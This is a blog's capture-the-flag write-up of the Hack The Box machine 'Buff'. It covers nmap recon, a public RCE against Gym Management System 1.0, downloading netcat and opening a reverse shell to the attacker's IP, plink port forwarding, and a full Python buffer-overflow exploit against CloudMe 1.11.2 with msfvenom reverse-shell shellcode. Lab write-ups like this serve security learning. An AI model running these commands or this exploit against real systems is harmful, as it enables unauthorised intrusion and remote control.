<!DOCTYPE html><html lang="en" mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>HTB - Buff Write-up | bigb0ss</title><meta name="generator" content="Jekyll v4.2.0" /><meta property="og:title" content="HTB - Buff Write-up" /><meta name="author" content="bigb0ss" /><meta property="og:locale" content="en_US" /><meta name="description" content="This one was an easy difficulty box. Good learning path for: Gym Management System 1.0 RCE plink.exe to Port Forward to Bypass Restrictions cloudMe.exe BoF Exploit" /><meta property="og:description" content="This one was an easy difficulty box. Good learning path for: Gym Management System 1.0 RCE plink.exe to Port Forward to Bypass Restrictions cloudMe.exe BoF Exploit" /><link rel="canonical" href="https://bigb0sss.github.io/posts/htb-buff-writeup/" /><meta property="og:url" content="https://bigb0sss.github.io/posts/htb-buff-writeup/" /><meta property="og:site_name" content="bigb0ss" /><meta property="og:image" content="https://bigb0sss.github.io/assets/img/post/htb/buff/01_infocard.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-11-20T10:25:00-05:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://bigb0sss.github.io/assets/img/post/htb/buff/01_infocard.png" /><meta property="twitter:title" content="HTB - Buff Write-up" /><meta name="twitter:site" content="@bigb0ss___" /><meta name="twitter:creator" content="@bigb0ss" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"bigb0ss"},"description":"This one was an easy difficulty box. Good learning path for: Gym Management System 1.0 RCE plink.exe to Port Forward to Bypass Restrictions cloudMe.exe BoF Exploit","@type":"BlogPosting","headline":"HTB - Buff Write-up","dateModified":"2020-11-20T10:25:00-05:00","datePublished":"2020-11-20T10:25:00-05:00","url":"https://bigb0sss.github.io/posts/htb-buff-writeup/","image":"https://bigb0sss.github.io/assets/img/post/htb/buff/01_infocard.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://bigb0sss.github.io/posts/htb-buff-writeup/"},"@context":"https://schema.org"}</script><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <script src="/assets/js/post.min.js" async></script> <script async src="https://www.googletagmanager.com/gtag/js?id=G-QE26N8SZTJ"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-QE26N8SZTJ'); </script> <script src="/app.js" defer></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/bigb0ss/bigb0ss.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">bigb0ss</a></div><div class="site-subtitle font-italic">OSCE | OSCP | Security Blog</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>BLOGS</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a href="https://www.linkedin.com/in/danielsmin" target="_blank"> <i class="fab fa-linkedin"></i> </a> <a href="https://github.com/bigb0sss" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/bigb0ss___" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['example','doamin.com'].join('@')" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>HTB - Buff Write-up</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>HTB - Buff Write-up</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Fri, Nov 20, 2020" > Nov 20 <i class="unloaded">2020-11-20T10:25:00-05:00</i> </span> by <span class="author"> bigb0ss </span></div><div> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Sun, Nov 22, 2020" > Nov 22 <i class="unloaded">2020-11-22T23:36:03-05:00</i> </span></div></div><div class="post-content"> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/post/htb/buff/01_infocard.png" class="post-preview-img"><p>This one was an easy difficulty box. Good learning path for:</p><ul><li>Gym Management System 1.0 RCE<li><code class="language-plaintext highlighter-rouge">plink.exe</code> to Port Forward to Bypass Restrictions<li><code class="language-plaintext highlighter-rouge">cloudMe.exe</code> BoF Exploit</ul><h1 id="initial-recon">Initial Recon</h1><h2 id="nmap">Nmap</h2><p>Let’s begin with an initial port scan:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>nmap <span class="nt">-Pn</span> <span class="nt">--open</span> <span class="nt">-p-</span> <span class="nt">-sC</span> <span class="nt">-sV</span> 10.10.10.198
<span class="go">
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
</span></pre></table></code></div></div><h3 id="interesting-ports-to-note">Interesting Ports to Note</h3><ul><li>HTTP (8080/TCP) - Web page. Gym Management Software 1.0</ul><p>The contact page disclosing the version of the application:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/post/htb/buff/02.png" alt="image" /></p><h1 id="initial-foothold">Initial Foothold</h1><p>That particular version of the software was vulnerable to an Unauthenticated Remote Code Execution discovered by Bobby Cooke. The POC exploitation script can be found <a href="https://www.exploit-db.com/exploits/48506">here</a>.</p><h2 id="gym-management-system-10---unauthenticated-remote-code-execution">Gym Management System 1.0 - Unauthenticated Remote Code Execution</h2><p>By running the POC script, I successfully obtained an interactive web shell on the Buff box.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/post/htb/buff/03.png" alt="image" /></p><h2 id="netcat-reverse-shell">Netcat Reverse Shell</h2><p>Using the PowerShell, I uploaded the <code class="language-plaintext highlighter-rouge">nc.exe</code> onto the Buff box.</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="gp">C:\&gt;</span><span class="w"> </span>powershell Invoke-WebRequest <span class="nt">-Uri</span> http://10.10.14.15/nc.exe <span class="nt">-OutFile</span> C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload<span class="se">\n</span>c.exe
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/post/htb/buff/04.png" alt="image" /></p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="go">C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.15 443 -e cmd.exe
</span></pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/post/htb/buff/05.png" alt="image" /></p><p>As the user <code class="language-plaintext highlighter-rouge">shaun</code> , I could read the <code class="language-plaintext highlighter-rouge">user.txt</code> file.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/post/htb/buff/06.png" alt="image" /></p><h1 id="privilege-escalation">Privilege Escalation</h1><h2 id="shaun--administrator">Shaun —&gt; Administrator</h2><p>Within the <code class="language-plaintext highlighter-rouge">shaun</code> user’s Download directory, there was a binary called <code class="language-plaintext highlighter-rouge">CloudMe_1112.exe</code> and this binary was actually running on the system as well.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/post/htb/buff/07.png" alt="image" /></p><p>With some Google search, I found a BOF exploit for this CloudMe version 1.11.2 <a href="https://www.exploit-db.com/exploits/48389">here</a>. From the POC script, the port for the CloudMe product was <code class="language-plaintext highlighter-rouge">8888</code> and that port was indeed in use on the Buff box; however, it was only accessible locally.</p><blockquote><p><strong>NOTE</strong>: I did not dig in further, but the PID for the CloudMe.exe kept changing. I suspected it was happening because of some type of scheduled tasks.</p></blockquote><h3 id="port-forwarding-plinkexe">Port Forwarding (plink.exe)</h3><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="gp">C:\&gt;</span><span class="w"> </span>powershell Invoke-WebRequest <span class="nt">-Uri</span> http://10.10.14.15/plink.exe <span class="nt">-OutFile</span> c:<span class="se">\U</span>sers<span class="se">\s</span>haun<span class="se">\D</span>ownloads<span class="se">\p</span>link.exe
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/post/htb/buff/08.png" alt="image" /></p><p>The outbound to port 22 from the Buff box was restricted. So, I had to modified the following SSH config on my Kali:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/post/htb/buff/09.png" alt="image" /></p><p>Starting an SSH service on my Kali Linux:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/post/htb/buff/10.png" alt="image" /></p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="gp">C:\&gt;</span><span class="w"> </span>c:<span class="se">\u</span>sers<span class="se">\s</span>haun<span class="se">\d</span>ownloads<span class="se">\p</span>link.exe <span class="nt">-ssh</span> <span class="nt">-P</span> 8001 root@10.10.14.15 <span class="nt">-R</span> 8002:127.0.0.1:8888 <span class="nt">-N</span>
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/post/htb/buff/11.png" alt="image" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/post/htb/buff/12.png" alt="image" /></p><h3 id="bof-exploit">BOF Exploit</h3><p>First, created the <code class="language-plaintext highlighter-rouge">msfvenom</code> payload for the reverse shell.</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="go">msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.15 8003 -e cmd.exe' -b '\x00\x0A\x0D' -f python
</span></pre></table></code></div></div><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">socket</span>

<span class="n">target</span> <span class="o">=</span> <span class="s">"127.0.0.1"</span>

<span class="n">padding1</span>   <span class="o">=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x90</span><span class="s">"</span> <span class="o">*</span> <span class="mi">1052</span>
<span class="n">EIP</span>        <span class="o">=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\xB5\x42\xA8\x68</span><span class="s">"</span> <span class="c1"># 0x68A842B5 -&gt; PUSH ESP, RET
</span><span class="n">NOPS</span>       <span class="o">=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x90</span><span class="s">"</span> <span class="o">*</span> <span class="mi">30</span>

<span class="c1"># msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.15 8003 -e cmd.exe' -b '\x00\x0A\x0D' -f python
</span><span class="n">buf</span> <span class="o">=</span>  <span class="sa">b</span><span class="s">""</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\xbf\xa8\x82\xfa\xea\xdd\xc1\xd9\x74\x24\xf4\x5d\x29</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\xc9\xb1\x3e\x83\xed\xfc\x31\x7d\x10\x03\x7d\x10\x4a</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x77\x06\x02\x08\x78\xf7\xd3\x6c\xf0\x12\xe2\xac\x66</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x56\x55\x1c\xec\x3a\x5a\xd7\xa0\xae\xe9\x95\x6c\xc0</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x5a\x13\x4b\xef\x5b\x0f\xaf\x6e\xd8\x4d\xfc\x50\xe1</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x9e\xf1\x91\x26\xc2\xf8\xc0\xff\x89\xaf\xf4\x74\xc7</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x73\x7e\xc6\xc6\xf3\x63\x9f\xe9\xd2\x35\xab\xb0\xf4</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\xb4\x78\xc9\xbc\xae\x9d\xf7\x77\x44\x55\x8c\x89\x8c</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\xa7\x6d\x25\xf1\x07\x9c\x37\x35\xaf\x7e\x42\x4f\xd3</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x03\x55\x94\xa9\xdf\xd0\x0f\x09\x94\x43\xf4\xab\x79</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x15\x7f\xa7\x36\x51\x27\xa4\xc9\xb6\x53\xd0\x42\x39</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\xb4\x50\x10\x1e\x10\x38\xc3\x3f\x01\xe4\xa2\x40\x51</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x47\x1b\xe5\x19\x6a\x48\x94\x43\xe1\x8f\x2a\xfe\x47</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x8f\x34\x01\xf8\xe7\x05\x8a\x97\x70\x9a\x59\xdc\x8e</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\xd0\xc0\x75\x06\xbd\x90\xc7\x4b\x3e\x4f\x0b\x75\xbd</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x7a\xf4\x82\xdd\x0e\xf1\xcf\x59\xe2\x8b\x40\x0c\x04</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x3f\x61\x05\x47\x85\xc1\xde\x29\x94\x89\x6e\xf6\x0e</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x1d\xeb\x69\xac\xae\xaf\x12\x4b\x3d\x0c\xa8\xdb\xd1</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\xc3\x33\x78\x75\x72\xd7\xae\xe0\xf2\x72\x8f\xdb\x32</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x53\xfe\x2b\x1d\x9a\x34\x65\x50\xe9\x14\x41\xa2\x21</span><span class="s">"</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x66\x91\xef\x24\xa8\xb2\x82\xc2\x86\x51\x25\x6e\xd7</span><span class="s">"</span>

<span class="n">overrun</span>    <span class="o">=</span> <span class="sa">b</span><span class="s">"C"</span> <span class="o">*</span> <span class="p">(</span><span class="mi">1500</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">padding1</span> <span class="o">+</span> <span class="n">NOPS</span> <span class="o">+</span> <span class="n">EIP</span> <span class="o">+</span> <span class="n">buf</span><span class="p">))</span>

<span class="n">buf</span> <span class="o">=</span> <span class="n">padding1</span> <span class="o">+</span> <span class="n">EIP</span> <span class="o">+</span> <span class="n">NOPS</span> <span class="o">+</span> <span class="n">buf</span> <span class="o">+</span> <span class="n">overrun</span> 

<span class="k">try</span><span class="p">:</span>
        <span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
        <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">target</span><span class="p">,</span><span class="mi">8002</span><span class="p">))</span>
        <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
<span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">exc_value</span><span class="p">)</span>
</pre></table></code></div></div><p>I received the elevated shell on the Netcat listener and read the <code class="language-plaintext highlighter-rouge">root.txt</code> flag.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/post/htb/buff/13.png" alt="image" /></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hack-the-box/'>Hack The Box</a>, <a href='/categories/windows/'>Windows</a>, <a href='/categories/easy/'>Easy</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/hackthebox/" class="post-tag no-text-decoration" >hackthebox</a> <a href="/tags/buff/" class="post-tag no-text-decoration" >buff</a> <a href="/tags/gymmanagementsystem-1.0-rce/" class="post-tag no-text-decoration" >gymManagementSystem 1.0 RCE</a> <a href="/tags/plink/" class="post-tag no-text-decoration" >plink</a> <a href="/tags/cloudme-bof/" class="post-tag no-text-decoration" >cloudMe bof</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https://bigb0sss.github.io/posts/htb-buff-writeup/" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank"> <i class="fa-fw fab fa-linkedin"></i> </a> <a href="https://twitter.com/intent/tweet?text=HTB - Buff Write-up - bigb0ss&url=https://bigb0sss.github.io/posts/htb-buff-writeup/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=HTB - Buff Write-up - bigb0ss&u=https://bigb0sss.github.io/posts/htb-buff-writeup/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=HTB - Buff Write-up - bigb0ss&url=https://bigb0sss.github.io/posts/htb-buff-writeup/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/redteam-rotate-ip-aws-gateway/">Rotating Source IPs (Part 1) - AWS API Gateway</a><li><a href="/posts/htb-servmon-writeup/">HTB - ServMon Write-up</a></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/x86/">x86</a> <a class="post-tag" href="/tags/slae32/">slae32</a> <a class="post-tag" href="/tags/assembly/">assembly</a> <a class="post-tag" href="/tags/redteam/">redteam</a> <a class="post-tag" href="/tags/cloud/">cloud</a> <a class="post-tag" href="/tags/zip2john/">zip2john</a> <a class="post-tag" href="/tags/web.config-rce/">web.config rce</a> <a class="post-tag" href="/tags/vhost/">vhost</a> <a class="post-tag" href="/tags/valentine/">valentine</a> <a class="post-tag" href="/tags/tomcat/">tomcat</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/htb-servmon-writeup/"><div class="card-body"> <span class="timeago small" > Nov 25 <i class="unloaded">2020-11-25T05:39:00-05:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HTB - ServMon Write-up</h3><div class="text-muted small"><p> This one was an easy-difficulty Windows box. Good learning path for: Anonymous FTP Access and Enumeration NVMS-1000 Directory Traversal Attack SMB Password Guessing (smbclient.py) NSClient...</p></div></div></a></div><div class="card"> <a href="/posts/htb-remote-writeup/"><div class="card-body"> <span class="timeago small" > Dec 3 <i class="unloaded">2020-12-03T07:39:00-05:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HTB - Remote Write-up</h3><div class="text-muted small"><p> This one was an easy-difficulty Windows box. Good learning path for: Initial Recon Nmap Let’s begin with an initial port scan: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 2...</p></div></div></a></div><div class="card"> <a href="/posts/htb-tabby-writeup/"><div class="card-body"> <span class="timeago small" > Nov 7 <i class="unloaded">2020-11-07T06:36:00-05:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HTB - Tabby Write-up</h3><div class="text-muted small"><p> This was an easy difficulty box. It was pretty easy and straight-forward box. Good learning path for: LFI File Enumeration Tomcat JSP Script Exploit Password Protected .zip File Abuse LXD ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/redteam-rotate-ip-aws-gateway/" class="btn btn-outline-primary"><p>Rotating Source IPs (Part 1) - AWS API Gateway</p></a> <a href="/posts/cloud-az-500/" class="btn btn-outline-primary"><p>Azure - AZ-500 Exam</p></a></div><div id="disqus" class="pt-2 pb-2"><p class="font-italic text-center text-muted small"> Comments powered by <a 